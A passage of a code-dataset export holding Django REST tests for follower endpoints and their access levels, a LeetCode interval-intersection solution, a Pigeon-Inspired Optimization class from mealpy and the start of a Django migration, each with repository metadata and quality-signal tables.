        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp = json.loads(response.content)
        self.assertEqual(dict_resp["id"], str(author2.id), f"incorrect author id! Expected: {str(author2.id)}")

    def test_get_specific_follower_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_get_specific_follower_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_get_specific_follower_author_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        response = self.client.get(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_get_specific_follower_author_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        response = self.client.get(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    # DELETEs ##################
    def test_delete_follower(self):
        """
        should successfully remove the follower
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 0, "follower list should have been empty but wasn't!")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author2.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 1, f"expected list of length 1 but got {len(dict_resp_data)}")

    def test_delete_follower_access_levels(self):
        """
        should return 401 for anonymous users, 403 for non participants and followees, and 204 for followers and admins
        """
        password = "password"
        user = User.objects.create_user("username1", password=password)
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2", password=password)
        author2: Author = Author.objects.get(userId=user2)
        self.client.login(username=user2.username, password=password)
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        self.client.logout()
        # test anonymous user
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
        # test non participant user
        nonParticipant = User.objects.create_user("nonParticipant", password=password)
        self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test followee
        self.client.logout()
        self.assertTrue(self.client.login(username=user.username, password=password))
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
        # test follower
        self.client.logout()
        self.assertTrue(self.client.login(username=user2.username, password=password))
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
        # have to replace for next delete call
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        # test admin
        self.client.logout()
        self.createAdmin()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")

    def test_delete_follower_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_delete_follower_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_delete_follower_author_nonexist(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = uuid4()
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_delete_follower_author_bad_uuid(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        authorId = "notARealUUID"
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_delete_non_follower(self):
        """
        should return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")

    def test_delete_follower_twice(self):
        """
        should successfully remove the follower, then return 404
        """
        user = User.objects.create_user("username1")
        author: Author = Author.objects.get(userId=user)
        user2 = User.objects.create_user("username2")
        author2: Author = Author.objects.get(userId=user2)
        self.createAdmin()
        self.auth_helper.get_author()
        response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
        response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
        self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
        dict_resp_data = json.loads(response.content)["data"]
        self.assertEqual(len(dict_resp_data), 0, "follower list should have been empty but wasn't!")
        response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
        self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
```
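The tests above lean on an AuthHelper with setup(), authorize_client(), and get_author() methods. A plausible shape for that helper, inferred only from how the tests call it (the repo's real tests/test_helper/auth_helper.py may differ):

```python
# Hedged sketch of the AuthHelper interface used above, inferred from the
# call sites; the admin username is hypothetical.
from apps.core.models import Author, User

class AuthHelper:
    def setup(self):
        # create an admin account for the tests to act as
        self.admin_user = User.objects.create_superuser("admin")

    def authorize_client(self, client):
        # DRF's force_authenticate skips real credential checks
        client.force_authenticate(user=self.admin_user)

    def get_author(self):
        # the Author row associated with the admin user
        return Author.objects.get(userId=self.admin_user)
```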
Row 1 derived statistics and quality signals (each signal has a float `*_quality_signal` column and a raw int64 counterpart):

| Field | Value |
|---|---|
| avg_line_length | 45.05638 |
| max_line_length | 149 |
| alphanum_fraction | 0.643638 |
| effective | 0 |
| hits | 8 |

| Signal | *_quality_signal | raw |
|---|---|---|
| qsc_code_num_words | 5,307 | 0 |
| qsc_code_num_chars | 45,552 | 0 |
| qsc_code_mean_word_length | 5.410025 | 0 |
| qsc_code_frac_words_unique | 0.041078 | null |
| qsc_code_frac_chars_top_2grams | 0.052384 | 0 |
| qsc_code_frac_chars_top_3grams | 0.094041 | 0 |
| qsc_code_frac_chars_top_4grams | 0.075755 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.928425 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.917732 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.910557 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.903939 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.900944 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.888928 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.021858 | 0 |
| qsc_code_frac_chars_whitespace | 0.212592 | 0 |
| qsc_code_size_file_byte | 45,552 | 0 |
| qsc_code_num_lines | 1,011 | 0 |
| qsc_code_num_chars_line_max | 150 | 0 |
| qsc_code_num_chars_line_mean | 45.05638 | 0 |
| qsc_code_frac_chars_alphabet | 0.778605 | 0 |
| qsc_code_frac_chars_comments | 0.041711 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.827532 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.286523 | 0 |
| qsc_code_frac_chars_long_word_length | 0.04637 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.25 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.063291 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.05538 | 1 |
| qsc_codepython_frac_lines_import | 0.011076 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.075949 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
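Most of the `qsc_*` columns are simple content statistics. As an illustration, two of the fraction signals could be computed like this (a sketch assuming the obvious definitions; the dataset pipeline's actual implementations may differ):

```python
# Hedged sketch: plausible definitions for two of the signals above.
def frac_chars_alphabet(text: str) -> float:
    # fraction of characters that are alphabetic
    return sum(c.isalpha() for c in text) / max(len(text), 1)

def frac_lines_dupe_lines(text: str) -> float:
    # fraction of non-blank lines that repeat an earlier line verbatim
    lines = [line for line in text.splitlines() if line.strip()]
    seen, dupes = set(), 0
    for line in lines:
        if line in seen:
            dupes += 1
        seen.add(line)
    return dupes / max(len(lines), 1)
```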
Row 2 metadata:

| Field | Value |
|---|---|
| hexsha | 5391c982cb4192ad40fe2c2b0ace82166ac9f4b7 |
| size | 1,119 |
| ext | py |
| lang | Python |
| max_stars_repo_path | 0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py |
| max_stars_repo_name | jiadaizhao/LeetCode |
| max_stars_repo_head_hexsha | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 49 |
| max_stars_repo_stars_event_min_datetime | 2018-05-05T02:53:10.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-30T12:08:09.000Z |
| max_issues_repo_path | 0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py |
| max_issues_repo_name | jolly-fellow/LeetCode |
| max_issues_repo_head_hexsha | ab20b3ec137ed05fad1edda1c30db04ab355486f |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 11 |
| max_issues_repo_issues_event_min_datetime | 2017-12-15T22:31:44.000Z |
| max_issues_repo_issues_event_max_datetime | 2020-10-02T12:42:49.000Z |
| max_forks_repo_path | 0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py |
| max_forks_repo_name | jolly-fellow/LeetCode |
| max_forks_repo_head_hexsha | ab20b3ec137ed05fad1edda1c30db04ab355486f |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 28 |
| max_forks_repo_forks_event_min_datetime | 2017-12-05T10:56:51.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-01-26T18:18:27.000Z |

Row 2 content:
```python
from typing import List  # needed for the List annotations below


class Solution:
    def intervalIntersection(self, A: List[List[int]], B: List[List[int]]) -> List[List[int]]:
        result = []
        i = j = 0
        while i < len(A) and j < len(B):
            if A[i][1] < B[j][0]:
                i += 1
            elif B[j][1] < A[i][0]:
                j += 1
            else:
                start = max(A[i][0], B[j][0])
                end = min(A[i][1], B[j][1])
                result.append([start, end])
                if A[i][1] <= B[j][1]:
                    i += 1
                else:
                    j += 1
        return result


class Solution2:
    def intervalIntersection(self, A: List[List[int]], B: List[List[int]]) -> List[List[int]]:
        result = []
        i = j = 0
        while i < len(A) and j < len(B):
            start = max(A[i][0], B[j][0])
            end = min(A[i][1], B[j][1])
            if start <= end:
                result.append([start, end])
            if A[i][1] <= B[j][1]:
                i += 1
            else:
                j += 1
        return result
```
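Both classes implement the standard two-pointer sweep for LeetCode 986: emit the overlap when one exists, then advance whichever interval ends first. A quick check on the problem's sample input (expected output shown as a comment):

```python
# Quick check of the two-pointer intersection above on the LeetCode 986
# sample input.
A = [[0, 2], [5, 10], [13, 23], [24, 25]]
B = [[1, 5], [8, 12], [15, 24], [25, 26]]
print(Solution().intervalIntersection(A, B))
# [[1, 2], [5, 5], [8, 10], [15, 23], [24, 24], [25, 25]]
```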
Row 2 derived statistics and quality signals:

| Field | Value |
|---|---|
| avg_line_length | 29.447368 |
| max_line_length | 94 |
| alphanum_fraction | 0.347632 |
| effective | 0 |
| hits | 7 |

| Signal | *_quality_signal | raw |
|---|---|---|
| qsc_code_num_words | 146 | 0 |
| qsc_code_num_chars | 1,119 | 0 |
| qsc_code_mean_word_length | 2.664384 | 0 |
| qsc_code_frac_words_unique | 0.184932 | null |
| qsc_code_frac_chars_top_2grams | 0.041131 | 0 |
| qsc_code_frac_chars_top_3grams | 0.169666 | 0 |
| qsc_code_frac_chars_top_4grams | 0.051414 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.856041 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.856041 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.838046 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.838046 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.838046 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.838046 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.043328 | 0 |
| qsc_code_frac_chars_whitespace | 0.484361 | 0 |
| qsc_code_size_file_byte | 1,119 | 0 |
| qsc_code_num_lines | 38 | 0 |
| qsc_code_num_chars_line_max | 95 | 0 |
| qsc_code_num_chars_line_mean | 29.447368 | 0 |
| qsc_code_frac_chars_alphabet | 0.630849 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.84375 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.0625 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.1875 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
Row 3 metadata:

| Field | Value |
|---|---|
| hexsha | 53c67ddc4d522fcc2aa592daeb46c15301b5636a |
| size | 7,276 |
| ext | py |
| lang | Python |
| max_stars_repo_path | mealpy/dummy/PIO.py |
| max_stars_repo_name | JokerHB/mealpy |
| max_stars_repo_head_hexsha | 4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 162 |
| max_stars_repo_stars_event_min_datetime | 2020-08-31T10:13:06.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-31T09:38:19.000Z |
| max_issues_repo_path | mealpy/dummy/PIO.py |
| max_issues_repo_name | JokerHB/mealpy |
| max_issues_repo_head_hexsha | 4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 51 |
| max_issues_repo_issues_event_min_datetime | 2020-09-13T10:46:31.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-30T06:12:08.000Z |
| max_forks_repo_path | mealpy/dummy/PIO.py |
| max_forks_repo_name | JokerHB/mealpy |
| max_forks_repo_head_hexsha | 4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 58 |
| max_forks_repo_forks_event_min_datetime | 2020-09-12T13:29:18.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-31T09:38:21.000Z |

Row 3 content:
```python
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 11:41, 08/04/2020                                                        %
#                                                                                                       %
#       Email:      nguyenthieu2102@gmail.com                                                           %
#       Homepage:   https://www.researchgate.net/profile/Thieu_Nguyen6                                  %
#       Github:     https://github.com/thieu1995                                                        %
# ------------------------------------------------------------------------------------------------------%

from numpy.random import uniform
from numpy import exp, sum
from mealpy.optimizer import Root


class BasePIO(Root):
    """
    My improved version of: Pigeon-Inspired Optimization (PIO)
    (Pigeon-inspired optimization: a new swarm intelligence optimizer for air robot path planning)
    Link:
        + DOI: 10.1108/IJICC-02-2014-0005
    Noted:
        + The paper is very unclear about most of the parameters and the flow of the algorithm (some points are even wrong)
        + This is my version; I changed almost everything, even the parameters and the flow of the algorithm
        + The personal best is also not needed in this version (so it is now much different from PSO)
    """

    def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, R=0.2, n_switch=0.75, **kwargs):
        super().__init__(obj_func, lb, ub, verbose, kwargs)
        self.epoch = epoch          # Nc1 + Nc2
        self.pop_size = pop_size    # Np
        self.R = R
        if n_switch < 1:
            self.n_switch = int(self.epoch * n_switch)
        else:
            self.n_switch = int(n_switch)   # Represents Nc1 and Nc2 in the paper

    def train(self):
        pop = [self.create_solution() for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
        list_velocity = uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
        n_p = int(self.pop_size / 2)
        for epoch in range(0, self.epoch):
            if epoch < self.n_switch:   # Map and compass operations
                for i in range(0, self.pop_size):
                    v_new = list_velocity[i] * exp(-self.R * (epoch + 1)) + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
                    x_new = pop[i][self.ID_POS] + v_new
                    x_new = self.amend_position_random(x_new)
                    fit = self.get_fitness_position(x_new)
                    if fit < pop[i][self.ID_FIT]:
                        pop[i] = [x_new, fit]
                        list_velocity[i] = v_new
            else:   # Landmark operations
                pop = sorted(pop, key=lambda item: item[self.ID_FIT])
                list_fit = [pop[i][self.ID_FIT] for i in range(0, n_p)]
                list_pos = [pop[i][self.ID_POS] for i in range(0, n_p)]
                frac_up = sum([list_fit[i] * list_pos[i] for i in range(0, n_p)], axis=0)
                frac_down = n_p * sum(list_fit)
                x_c = frac_up / frac_down
                ## Move all pigeons based on the target x_c
                for i in range(0, self.pop_size):
                    x_new = pop[i][self.ID_POS] + uniform() * (x_c - pop[i][self.ID_POS])
                    fit_new = self.get_fitness_position(x_new)
                    if fit_new < pop[i][self.ID_FIT]:
                        pop[i] = [x_new, fit_new]
            # Update the global best
            g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train


class LevyPIO(BasePIO):
    """
    My levy version of: Pigeon-Inspired Optimization (PIO)
    (Pigeon-inspired optimization: a new swarm intelligence optimizer for air robot path planning)
    Noted:
        + The paper is very unclear about most of the parameters and the flow of the algorithm (some points are even wrong)
        + This is my version; I changed almost everything, even the parameters and the flow of the algorithm
        + The personal best is also not needed in this version (so it is now much different from PSO)
        + I applied levy-flight here for more robustness
    """

    def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, R=0.2, n_switch=0.75, **kwargs):
        BasePIO.__init__(self, obj_func, lb, ub, verbose, epoch, pop_size, R, n_switch, kwargs=kwargs)

    def train(self):
        pop = [self.create_solution() for _ in range(self.pop_size)]
        g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
        list_velocity = uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
        n_p = int(self.pop_size / 2)
        for epoch in range(0, self.epoch):
            if epoch < self.n_switch:   # Map and compass operations
                for i in range(0, self.pop_size):
                    v_new = list_velocity[i] * exp(-self.R * (epoch + 1)) + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
                    x_new = pop[i][self.ID_POS] + v_new
                    x_new = self.amend_position_random(x_new)
                    fit_new = self.get_fitness_position(x_new)
                    if fit_new < pop[i][self.ID_FIT]:
                        pop[i] = [x_new, fit_new]
                        list_velocity[i] = v_new
            else:   # Landmark operations
                pop = sorted(pop, key=lambda item: item[self.ID_FIT])
                list_fit = [pop[i][self.ID_FIT] for i in range(0, n_p)]
                list_pos = [pop[i][self.ID_POS] for i in range(0, n_p)]
                frac_up = sum([list_fit[i] * list_pos[i] for i in range(0, n_p)], axis=0)
                frac_down = n_p * sum(list_fit)
                x_c = frac_up / frac_down
                ## Move all pigeons based on the target x_c
                for i in range(0, self.pop_size):
                    if uniform() < 0.5:
                        x_new = pop[i][self.ID_POS] + uniform() * (x_c - pop[i][self.ID_POS])
                    else:
                        x_new = self.levy_flight(epoch, pop[i][self.ID_POS], g_best[self.ID_POS])
                    fit_new = self.get_fitness_position(x_new)
                    if fit_new < pop[i][self.ID_FIT]:
                        pop[i] = [x_new, fit_new]
            # Update the global best
            g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
            self.loss_train.append(g_best[self.ID_FIT])
            if self.verbose:
                print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
        self.solution = g_best
        return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
```
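For context, a hypothetical way to drive this optimizer, assuming the mealpy-1.x-style Root base class imported above supplies create_solution(), get_fitness_position(), and the other helpers the train() loop calls:

```python
# Hedged usage sketch for BasePIO; the objective function and bounds are
# made up for illustration.
from numpy import sum as np_sum

def sphere(solution):
    return np_sum(solution ** 2)  # simple convex test function

model = BasePIO(obj_func=sphere, lb=[-10] * 10, ub=[10] * 10,
                verbose=False, epoch=100, pop_size=50, R=0.2, n_switch=0.75)
best_pos, best_fit, loss_history = model.train()
print(best_fit)
```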
Row 3 derived statistics and quality signals:

| Field | Value |
|---|---|
| avg_line_length | 53.5 |
| max_line_length | 131 |
| alphanum_fraction | 0.529962 |
| effective | 0 |
| hits | 7 |

| Signal | *_quality_signal | raw |
|---|---|---|
| qsc_code_num_words | 995 | 0 |
| qsc_code_num_chars | 7,276 | 0 |
| qsc_code_mean_word_length | 3.658291 | 0 |
| qsc_code_frac_words_unique | 0.18191 | null |
| qsc_code_frac_chars_top_2grams | 0.059341 | 0 |
| qsc_code_frac_chars_top_3grams | 0.044505 | 0 |
| qsc_code_frac_chars_top_4grams | 0.046703 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.837912 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.826923 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.826923 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.823077 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.81456 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.81456 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.017935 | 0 |
| qsc_code_frac_chars_whitespace | 0.340984 | 0 |
| qsc_code_size_file_byte | 7,276 | 0 |
| qsc_code_num_lines | 135 | 0 |
| qsc_code_num_chars_line_max | 132 | 0 |
| qsc_code_num_chars_line_mean | 53.896296 | 0 |
| qsc_code_frac_chars_alphabet | 0.741189 | 0 |
| qsc_code_frac_chars_comments | 0.275838 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.788235 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.009401 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.047059 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.035294 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.129412 | 0 |
| qsc_codepython_frac_lines_print | 0.023529 | 0 |
Row 4 metadata:

| Field | Value |
|---|---|
| hexsha | 53c9df34d09605adaba61ff0e972cf1d141b4fda |
| size | 10,756 |
| ext | py |
| lang | Python |
| max_stars_repo_path | web/transiq/fms/migrations/0012_auto_20180607_1746.py |
| max_stars_repo_name | manibhushan05/transiq |
| max_stars_repo_head_hexsha | 763fafb271ce07d13ac8ce575f2fee653cf39343 |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | web/transiq/fms/migrations/0012_auto_20180607_1746.py |
| max_issues_repo_name | manibhushan05/transiq |
| max_issues_repo_head_hexsha | 763fafb271ce07d13ac8ce575f2fee653cf39343 |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 14 |
| max_issues_repo_issues_event_min_datetime | 2020-06-05T23:06:45.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-12T00:00:18.000Z |
| max_forks_repo_path | web/transiq/fms/migrations/0012_auto_20180607_1746.py |
| max_forks_repo_name | manibhushan05/transiq |
| max_forks_repo_head_hexsha | 763fafb271ce07d13ac8ce575f2fee653cf39343 |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

Row 4 content:
```python
# Generated by Django 2.0.5 on 2018-06-07 17:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('supplier', '0023_auto_20180519_0041'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('fms', '0011_mobileappversions_upgrade_type'),
    ]

    operations = [
        migrations.CreateModel(
            name='HistoricalQuoteVehicles',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('vehicle_no', models.CharField(max_length=20)),
                ('status', models.CharField(blank=True, max_length=15, null=True)),
                ('created_on', models.DateTimeField(blank=True, editable=False)),
                ('updated_on', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
